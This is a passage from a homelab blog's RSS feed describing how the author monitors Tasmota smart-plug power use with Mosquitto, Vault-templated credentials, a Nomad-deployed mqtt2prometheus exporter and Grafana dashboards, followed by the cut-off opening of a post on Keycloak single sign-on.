</span></span><span style="display:flex;"><span>{{ <span style="color:#960050;background-color:#1e0010">$</span><span style="color:#a6e22e">username</span> }}:{{ <span style="color:#960050;background-color:#1e0010">$</span><span style="color:#a6e22e">v</span> }}
</span></span><span style="display:flex;"><span>{{ <span style="color:#a6e22e">end</span> }}{{ <span style="color:#a6e22e">end</span> }}{{ <span style="color:#a6e22e">end</span> }}
</span></span></code></pre></div><p>This is obviously not Mosquitto&rsquo;s standard passwd format. Instead, it&rsquo;s a
<code>consul-template</code> template. It goes over all usernames in my Vault secrets store
for Mosquitto and lists them together with the passwords. This way, I don&rsquo;t need
to check the passwords into my Homelab repo.</p>
<p>The deployed file looks something like this:</p>
<pre tabindex="0"><code>user1:$7$PASSWORD_GIBBERISH_HERE==

user2:$7$DIFFERENT_PASSWORD_GIBBERISH_HERE==
</code></pre><p>The password file&rsquo;s entries can be created with Mosquitto&rsquo;s own <a href="https://mosquitto.org/man/mosquitto_passwd-1.html">mosquitto_passwd</a>
tool. This also works well when launching the tool via the Mosquitto Docker
container.</p>
<p>Finally, I&rsquo;ve also configured some ACLs to make sure that even if some IoT
device gets hacked, it can&rsquo;t do too much. The ACL file looks like this:</p>
<pre tabindex="0"><code>user plugs
topic read plugs/tasmota/cmnd/#
topic readwrite plugs/tasmota/stat/#
topic readwrite plugs/tasmota/tele/#

user metrics
topic read plugs/tasmota/tele/#
</code></pre><p>This allows my <code>plugs</code> user to only read/write under the <code>plugs/tasmota</code>
subtopics.</p>
<p>The <code>metrics</code> user then only has read access, and is used by my prometheus
exporter to read and store the data reported by the plugs for later use in
Grafana.</p>
<h2 id="getting-the-data-from-mqtt-to-prometheus">Getting the data from MQTT to Prometheus</h2>
<p>Because I&rsquo;m already doing all of my metrics and monitoring via Prometheus and
Grafana, I also wanted to use Prometheus for long term storage for the data
from the power plugs. Looking around, I found <a href="https://github.com/hikhvar/mqtt2prometheus">mqtt2prometheus</a>,
which has been working pretty well.</p>
<p>I decided to deploy mqtt2prometheus in the same job and task group as Mosquitto.
My thinking was: The resource requirements are very low, and Mosquitto will be
the scraper&rsquo;s main communication partner. This way, I could just put them
all into the same task group, and hence into the same networking namespace. This
saved me from needing to configure Consul Connect for the communication.</p>
<p>The relevant parts in the Nomad job file look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;mosquitto&#34;</span> {
</span></span><span style="display:flex;"><span>  datacenters <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;homenet&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  priority <span style="color:#f92672">=</span> <span style="color:#ae81ff">50</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">constraint</span> {
</span></span><span style="display:flex;"><span>    attribute <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${node.class}&#34;</span>
</span></span><span style="display:flex;"><span>    value     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;internal&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;mosquitto&#34;</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;mqtt&#34;</span> {}
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;pwr-exporter&#34;</span> {
</span></span><span style="display:flex;"><span>        static <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;9641&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">    # Service def for Mosquitto removed
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;pwr-exporter&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;pwr-exporter&#34;</span>
</span></span><span style="display:flex;"><span>    }<span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">    # Mosquitto Task def removed here
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;pwr-exporter&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ghcr.io/hikhvar/mqtt2prometheus:v0.1.7&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        args <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;-config&#34;, &#34;/secrets/config.yaml&#34;</span>,
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;-listen-port&#34;, &#34;${NOMAD_PORT_pwr_exporter}&#34;</span>,
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;-log-format&#34;, &#34;json&#34;</span>,
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">vault</span> {
</span></span><span style="display:flex;"><span>        policies <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;mosquitto&#34;</span>]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">template</span> {
</span></span><span style="display:flex;"><span>        data <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;mosquitto/templates/pwr-exporter.yaml&#34;</span>)
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;secrets/config.yaml&#34;</span>
</span></span><span style="display:flex;"><span>        change_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;restart&#34;</span>
</span></span><span style="display:flex;"><span>        perms <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;600&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">resources</span> {
</span></span><span style="display:flex;"><span>        cpu <span style="color:#f92672">=</span> <span style="color:#ae81ff">50</span>
</span></span><span style="display:flex;"><span>        memory <span style="color:#f92672">=</span> <span style="color:#ae81ff">50</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I removed the Mosquitto specific parts of the job file above. See the job file
in the Mosquitto section to see the Mosquitto task&rsquo;s config.</p>
<p>First, the exporter is bound to a static port, &ldquo;9641&rdquo;. This is necessary because
we need to provide a fixed scrape domain:port setting in Prometheus&rsquo; conf.
(I&rsquo;ve still got a task in my backlog to look into Prometheus&rsquo; support for
scrape target discovery via Consul).</p>
<p>The <code>pwr-exporter.yml</code> file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">mqtt</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">server</span>: <span style="color:#ae81ff">tcp://mqtt.example.com:1883</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>: <span style="color:#ae81ff">promexport</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#39;{{ with secret &#34;my_secrets/my_services/mosquitto/users/exporter-clear&#34; }}{{ .Data.secret }}{{end}}&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">client_id</span>: <span style="color:#ae81ff">my-exporters-pwr</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">topic_path</span>: <span style="color:#e6db74">&#34;plugs/tasmota/tele/#&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">device_id_regex</span>: <span style="color:#e6db74">&#34;plugs/tasmota/tele/(?P&lt;deviceid&gt;.*)/.*&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">prom_name</span>: <span style="color:#ae81ff">mqtt_total_power_kwh</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mqtt_name</span>: <span style="color:#ae81ff">ENERGY.Total</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">help</span>: <span style="color:#e6db74">&#34;Total power consumption (kWh)&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">counter</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">prom_name</span>: <span style="color:#ae81ff">mqtt_power</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mqtt_name</span>: <span style="color:#ae81ff">ENERGY.Power</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">help</span>: <span style="color:#e6db74">&#34;Current consumption (W)&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">prom_name</span>: <span style="color:#ae81ff">mqtt_current</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mqtt_name</span>: <span style="color:#ae81ff">ENERGY.ApparentPower</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">help</span>: <span style="color:#e6db74">&#34;Current (A)&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">prom_name</span>: <span style="color:#ae81ff">mqtt_yesterday_pwr</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mqtt_name</span>: <span style="color:#ae81ff">ENERGY.Yesterday</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">help</span>: <span style="color:#e6db74">&#34;Yesterdays Total Power Consumption (kWh)&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">counter</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">prom_name</span>: <span style="color:#ae81ff">mqtt_today_pwr</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mqtt_name</span>: <span style="color:#ae81ff">ENERGY.Today</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">help</span>: <span style="color:#e6db74">&#34;Todays Total Power Consumption (kWh)&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">counter</span>
</span></span></code></pre></div><p>There are two main settings to be configured for the exporter. The first one is
the config of the MQTT broker to be scraped, our Mosquitto instance in this
case. Here I hit a little snag, shown by the &ldquo;-clear&rdquo; at the end of the
export&rsquo;s PW. I need the same PW in two formats in my Vault: Once fully hashed,
to bet written into the Mosquitto <code>passwd</code> file, and once in clear text, for
writing the exporter config file. I don&rsquo;t know yet how to do this better. One
possibility might be to look at the Go template language (which consul-template
uses) and see whether I can get away with storing only the plaintext password.
Then, in the template for the Mosquitto <code>passwd</code> file, I could manually hash
the password as part of writing the passwd file.</p>
<p>The <code>topic_path</code> configures which topic the exporter listens to. The <code>device_id_regex</code>
is important: It determines what ends up in the <code>sensor</code> label of the prometheus
metrics gathered. My topics look like this: <code>plugs/tasmota/tele/livingroom</code>.
So for my sensors, the part of the MQTT topic after <code>tele</code> is the label I would
like to have on the metrics.</p>
<p>The second part of the config is the <code>metrics</code> config, where parts of the MQTT
messages are mapped to Prometheus metrics. To explain my config, let&rsquo;s look
at an example message again:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Time&#34;</span>: <span style="color:#e6db74">&#34;2023-06-08T22:01:44&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;ENERGY&#34;</span>: {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;TotalStartTime&#34;</span>: <span style="color:#e6db74">&#34;2023-02-01T21:57:12&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Total&#34;</span>: <span style="color:#ae81ff">405.918</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Yesterday&#34;</span>: <span style="color:#ae81ff">3.481</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Today&#34;</span>: <span style="color:#ae81ff">3.19</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Period&#34;</span>: <span style="color:#ae81ff">12</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Power&#34;</span>: <span style="color:#ae81ff">150</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ApparentPower&#34;</span>: <span style="color:#ae81ff">214</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ReactivePower&#34;</span>: <span style="color:#ae81ff">153</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Factor&#34;</span>: <span style="color:#ae81ff">0.7</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Voltage&#34;</span>: <span style="color:#ae81ff">233</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Current&#34;</span>: <span style="color:#ae81ff">0.918</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I don&rsquo;t care about the MQTT message&rsquo;s timestamp, so I ignore the <code>Time</code> part
of the message. The <code>ENERGY</code> object is what we&rsquo;re interested here, and we tell
mqtt2prometheus how to interpret it. I chose to prefix all metrics extracted
from MQTT with <code>mqtt_</code> in my own setup, but hat is not a requirement.
The <code>mqtt_name</code> is simply the path to the JSON object&rsquo;s property we are
interested in. For the type, it depends a bit on what the specific metrics
represents. To me, all of the &ldquo;total power&rdquo; metrics (overall, current day, previous day)
are counters, as they monotonically increase throughout the day, and are then
reset at the end of the day (for the &ldquo;yesterday&rdquo; and &ldquo;current day&rdquo; metrics).</p>
<p>Just for reference, the Prometheus scrape config for the MQTT exporter looks
like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">job_name</span>: <span style="color:#ae81ff">mqtt-exporters</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metrics_path</span>: <span style="color:#e6db74">&#34;/metrics&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scrape_interval</span>: <span style="color:#ae81ff">100s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">static_configs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;pwr-exporter.service.consul:9641&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metric_relabel_configs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">source_labels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">go_.*</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">source_labels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">process_.*</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">source_labels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">promhttp_.*</span>
</span></span></code></pre></div><p>The metrics relabel config simply drops a couple of metrics related to the
exporter itself which I&rsquo;m not interested in.</p>
<p>The <code>100s</code> scrape interval might also be worth a short comment: There are just
not that many MQTT messages send out, and I don&rsquo;t really need that much precision
for my power measurements (and temperature measurements, but those will get their
own article).</p>
<h2 id="creating-a-grafana-dashboard">Creating a Grafana Dashboard</h2>
<p>I already showed off my Power measurement Grafana dashboard at the beginning
of the post. I&rsquo;ve got three panels there related to power consumption:</p>
<ol>
<li>Current power draw in Watts</li>
<li>Total power draw for today and yesterday</li>
<li>Total power consumption past week</li>
</ol>
<p>Not all of these panels are configured perfectly yet. But I still want to
show them off and also explain the Prometheus queries I used for them.</p>
<h3 id="current-power-draw-in-watts">Current power draw in Watts</h3>
<figure>
    <img loading="lazy" src="current_power_draw.png"
         alt="A screenshot of a Grafana panel. It is titled &#39;Overall current power draw&#39;. The X axis is showing time, going from 07:00 to 18:30. The Y axis shows power draw, going from 0 Watts to 180 Watts. There are three curves in the plot. The one labeled &#39;deskleft&#39; shows a constant 6W draw over the entire time-span of the plot. The curve labeled &#39;deskright&#39; fluctuates a bit, going from 8 W to 17 W occasionally. Finally, the &#39;homelab&#39; curve also shows some peaks of up to 170 W, but most of the time also fluctuates around 145 W."/> <figcaption>
            <p>The plot showing current power draw of my setup. The <code>homelab</code> curve is my entire Homelab setup, while <code>deskright</code> and <code>deskleft</code> are the power strips powering the rest of my desk, e.g. my desktop, WiFi AP etc.</p>
        </figcaption>
</figure>

<p>This is the most boring plot, from the PoV of PromQL, and at the same time the
one I look at the most. The PromQL query is just <code>mqtt_power</code>.</p>
<h3 id="total-power-draw-in-kwh">Total power draw in kWh</h3>
<p>The next panel has an at least a bit more complex query config. It shows the
total power draw in kWh, for all three plugs in my system, for both the current
day, and the previous day.</p>
<figure>
    <img loading="lazy" src="total_power_draw_panel.png"
         alt="A screenshot of a Grafana panel. The panel shows a bar chart, titled &#39;Total Power Draw&#39;. The X axis shows labels, from left to right: &#39;deskleft&#39;, &#39;deskright&#39; and &#39;homelab&#39;. The Y axis shows kWh consumed. For each of the labels on the X axis, there are two bars, labeled &#39;yesterday&#39; and &#39;today&#39;. For deskleft, yesterday shows 144 Wh and Today shows 109 Wh. Deskright is a bit more, with 235 Wh for yesterday and 178 Wh for today. Finally, Homelab takes the crown, with 3.48 kWh for yesterday and 2.64 kWh for today."/> <figcaption>
            <p>Total Power Draw plot. Notably, this screenshot was taken for a day where I wasn&rsquo;t home at all.</p>
        </figcaption>
</figure>

<p>As I noted, the config is a bit more interesting here. First of all, there are
two PromQL queries for this plot, one on <code>mqtt_yesterday_pwr</code> and one on
<code>mqtt_today_pwr</code>. The type of the plot is <em>bar chart</em>. The X axis is configured
to go over the <code>sensor</code> label. This label is set to the different names for my
plugs, which in turn are named for the location they&rsquo;re plugged in.</p>
<p>The problem with this plot was that I wanted the two different metrics, the
total consumption for today and yesterday, as two separate bars for each of
the labels. After some trial and error, I figured out that I can do it in
Grafana by using &ldquo;Transforms&rdquo;. I&rsquo;m using two of them. The more important one
is the <code>Join by labels</code> transform. See the Grafana docs <a href="https://grafana.com/docs/grafana/latest/panels-visualizations/query-transform-data/transform-data/">here</a>. I&rsquo;m joining on the <code>_name_</code>
of the <code>sensor</code> label. This way, I end up with the values grouped by sensor.
Then I&rsquo;m using an <code>Organize fields</code> transform, to rename <code>mqtt_yesterday_pwr</code>
and <code>mqtt_today_pwr</code> to <code>Yesterday</code> and <code>Today</code> respectively. This makes the
labels a bit nicer.</p>
<h3 id="power-consumption-per-day-over-one-week">Power consumption per day over one week</h3>
<p>This is the one plot which does not really work as intended. The idea was to
show the values for total power draw for all three plugs per day for the past
week, to get an overview of how the consumption is developing.</p>
<figure>
    <img loading="lazy" src="power_consumption_week_panel.png"
         alt="Another bar chart, titled &#39;Total power consumption past week&#39;. On the X axis are the names of the weekdays, going from Saturday to Sunday the following week. The Y axis shows the consumed power in kWh, going from 0 to 3.5. Each day has three bars, labeled deskleft, deskright and homelab. The homelab bar is very consistent around 3.5 kWh. The deskright value consistently increases from Saturday until Wednesday, going from 2 kWh to 2.8 kWh. On Thursday, it starts falling, going down to 2 kWh on Thursday and below 0.5 kWh for Friday, Saturday and Sunday. The deskleft values are also very consistent. They hover around 0.5 kWh from Saturday to Thursday, and go down to around 0.2 kWh for the rest of the days."/> <figcaption>
            <p>Total Power Draw plot. Notably, this screenshot was taken for a day where I wasn&rsquo;t home at all.</p>
        </figcaption>
</figure>

<p>This plot was the most complicated one, and it still does not work right.
Having a look at the screenshot above, note how both the <code>deskleft</code> and <code>deskright</code>
plots get considerably lower starting on Friday? That&rsquo;s wrong. The week that&rsquo;s
shown here was a vacation week for me, which is why the values for deskleft
and deskright got so high - those plugs are measuring the power consumption of
my desktop machine, including screens. And on Thursday (Donnerstag), I left
very early to visit some friends and family, where I wasn&rsquo;t home at all.
But Thursday is still very high - which is because those bars are actually the
values for Wednesday (Mittwoch), not the ones for Thursday. So something is
still wrong in my config.</p>
<p>Still, I want to show you a little bit of what&rsquo;s going on in the Grafana config
for this particular plot.</p>
<p>First, the PromQL query:</p>
<pre tabindex="0"><code>max_over_time(mqtt_today_pwr[24h] offset -24h)
</code></pre><p>This takes the 24h long intervals (meaning all data points in that interval),
and takes the maximum over it - which, because the daily value resets at
midnight, is the final value of that day. The <code>-24h</code> offset is needed to make
sure that you actually get a value from the previous day - not the current day.</p>
<p>The real &ldquo;magic&rdquo; here happens in the Grafana query options though. Here, I
configured the &ldquo;Relative time&rdquo; field to &ldquo;8d&rdquo;, which gives me the entire past
week.</p>
<p>I&rsquo;m not 100% sure which configuration is throwing the daily alignment out of
whack here.
I think something is wrong with my assumption that the 24h offset together
with <code>max_over_time</code> guarantees that I get the max value for each day.</p>
<h2 id="some-interesting-data-points">Some interesting data points</h2>
<p>Before finishing the article, I want to show off a couple of interesting plots.</p>
<p>This first one showed an interesting change: I switched off a VM, which served
as a Nomad worker, on my x86 server. The server kept running, and was at that
point still running two Ceph nodes. But it was no longer running any Nomad
workloads. All of the workloads still ran, just now on Raspberry Pis instead
of a VM on my x86 server.</p>
<figure>
    <img loading="lazy" src="power_draw_bastet.png"
         alt="A screenshot of a Grafana time series plot. It is titled &#39;Overall current power draw&#39;. The X axis shows time, going from 03.03.2023 00:00h to 09.03.2023 00:00h. The Y axis shows power consumption in Watts, going from 120W to 190W. There are a lot of spikes in the power draw line, but more importantly, the initial floor, the lowest power consumption, is around 130W, from the start to around 12:00h on 05.03. Starting then, the lowest consumption falls, and reaches a new floor around 125W, which is kept until the graph ends."/> <figcaption>
            <p>Plot showing homelab power consumption. Notably, the floor drops from 130W to 125W around March 5th.</p>
        </figcaption>
</figure>

<p>This next one mostly shows how expensive running a Gentoo desktop is. I think
I should switch to Ubuntu or something like it, for the sake of the environment. &#x1f605;</p>
<figure>
    <img loading="lazy" src="gentoo_update.png"
         alt="A screenshot of a Grafana plot titled &#39;Overall current power draw&#39;. The X axis shows time, going from 10:00 on the left to 16:30 on the right. The Y axis shows power consumption in Watts, going from zero to 400W. The plot starts out hovering around 100W until about 10:50, where it goes up to 150W. Starting at 11:30, the plot peaks up to over 350W. It only returns to below 150W for the first time again at 14:25. Then it again has three peaks up to over 250W. At around 15:15, it finally returns to hovering around 100W."/> <figcaption>
            <p>Plot showing my desktop&rsquo;s power consumption during a Gentoo Linux world update.</p>
        </figcaption>
</figure>

<p>In the same vain, gaming is also damned expensive. Here is my desktop&rsquo;s power
consumption during a night of Anno 1800. You can even see where I hit the pause
button to grab something to drink or go for a smoke.</p>
<figure>
    <img loading="lazy" src="anno_1800.png"
         alt="A screenshot of a Grafana plot, titled &#39;Overall current power draw.&#39; The X axis shows time, going from 23:30 to 03:30, while the Y axis shows power consumption in Watts, going from 0W to 325W. Until about 23:32, the plot hovers around 100W. Then it goes up to 285W. It hovers between 275W and 300W for most of the time, with small negative peaks down to around 180W for about five minutes each. The plot goes down to about 100W again at 02:10 and then down to about 10W at 02:15."/> <figcaption>
            <p>Plot showing my desktop&rsquo;s power consumption while playing Anno 18:00.</p>
        </figcaption>
</figure>

<p>Another one I found interesting is the consumption while I&rsquo;m working from home.
You can even see where I got coffee or went for a smoke and Windows put my
screens in stand-by.</p>
<figure>
    <img loading="lazy" src="home_office.png"
         alt="A screenshot of a Grafana plot with the title &#39;Overall current power draw&#39;. The X axis shows time, starting with 00:00 on the left to 23:00 on the right. The Y axis shows power consumption in Watts. There are two plots, one labeled &#39;deskleft&#39; and one labeled &#39;deskright&#39;. &#39;deskright&#39; starts out at 160W, while &#39;deskleft&#39; starts at 30W. Both go down at about 00:30, to about 15W. They stay there until around 08:15. &#39;deskleft&#39; then goes up to 30W again and stays there until the end of the plot, for the most part. &#39;deskright&#39; forms a baseline around 40W until around 19:00. Then it goes up to 140W until about 20:30, when it goes down to a baseline around 100W. Both of the curves show troughs throughout the day until 19:00. In those troughs, &#39;deskleft&#39; goes down to about 10W and &#39;deskright&#39; goes down to 20W. These troughs are around 10 minutes long each. The one exception is a trough around 11:50 to 12:50."/> <figcaption>
            <p>Plot showing the power consumption during a Work from Home day.</p>
        </figcaption>
</figure>

<p>Another PoV is the daily total consumption for that week, where I was working
from home Thursday and Friday. On both days, I used approximately 430 Wh more
in electricity than on the other days, where I was working from the office.</p>
<figure>
    <img loading="lazy" src="home_office_week.png"
         alt="A screenshot of a Grafana plot, titled &#39;Total power consumption past week&#39;. The X axis shows weekdays, going from Monday to Sunday. The Y axis shows power consumption in kWh. It goes from 0 kWh to 3.5kWh. Each of the weekdays show three bars, labeled &#39;deskleft&#39;, &#39;deskright&#39; and &#39;homelab&#39;. The &#39;homelab&#39; bar is ignored here, as it is not pertinent to the figure. The &#39;deskleft&#39; bar starts out at around 250Wh from Monday to Wednesday. On Thursday, it goes to about 500Wh, ending at about 550Wh on Saturday and Sunday. The &#39;deskright&#39; bar is around 750Wh on Monday and Tuesday, and around 900Wh on Wednesday. Then it is around 1.25kWh for Thursday and Friday. On Saturday and Sunday, it is around 2.1kWh and 2.25kWh respectively."/> <figcaption>
            <p>Plot showing my power consumption during a week where I worked from home on Thursday and Friday.</p>
        </figcaption>
</figure>

<p>To be honest, this project wasn&rsquo;t very much about controlling/reducing my
power consumption. The switch to mostly Raspberry Pis for the Homelab was
planned before I ever started measuring the lab&rsquo;s power consumption. But I
mostly wanted it to figure out whether replacing my one x86 machine with all
my current gear would reduce my electricity needs. It turns out it did not.</p>
<figure>
    <img loading="lazy" src="homelab_power.png"
         alt="A screenshot of a Grafana panel, titled &#39;Overall current power draw&#39;. The X axis shows time going from February 2nd to June 9th. The Y axis shows power consumption in Watts going from 0W to 190W. The plot starts out with a baseline around 130W, with occasional spikes to around 140W. It falls to a baseline of about 125W on February 20th. Again, with spikes up to 160W, it stays there until April 22nd. Then, it goes up to a new baseline of about 150W. It stays on that baseline until about April 30th, when it falls slightly to a baseline of 145W, where it stays for the rest of the plot."/> <figcaption>
            <p>Plot showing my homelab&rsquo;s power consumption from when measurements started until the time of writing this article.</p>
        </figcaption>
</figure>

<p>The sudden jump in power consumption at the end of April was when I added another x86 machine as a
ceph host, and the slight drop shortly thereafter was when I finally switched off
my original home server.</p>
<p>Ah well, the primary goal was high availability anyway. &#x1f609;</p>
]]></content:encoded>
    </item>
    <item>
      <title>SSO with Keycloak in the Homelab</title>
      <link>https://blog.mei-home.net/posts/sso/</link>
      <pubDate>Mon, 24 Apr 2023 15:03:41 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/sso/</guid>
      <description>Setting up Keycloak for SSO and 2FA with Gitea, Mastodon, Nextcloud, Grafana</description>
      <content:encoded><![CDATA[<p>I wanted to have Single Sign-On (SSO) for as many of my services as possible
for quite a while. One of the main triggers was the need for 2FA, in particular
for the services accessible externally, to improve general security of my
Homelab setup.</p>
<p>SSO means that a user only logs in once, and with a single username/password
combo, and then gets access to multiple different services with that login. The
implementation is based first on <a href="https://auth0.com/intro-to-iam/what-is-oauth-2">OAuth2</a>.
This is a HTTP based protocol which facilitates authorization between multiple
entities:</p>
<ol>
<li>The resource owner: That&rsquo;s you, the user</li>
<li>The client: This might be a website, smartphone app, etc</li>
<li>The resource server: This is the application which has the resources you want
to access</li>
<li>The authorization server: This is the application which grants access</li>
</ol>
<p>To be entirely honest, I&rsquo;m probably not the right guy to explain this all in
detail, as I&rsquo;m not sure I actually understand all of it. &#x1f937;</p>
<p>But let me try to give you an example of where I&rsquo;ve previously come into contact
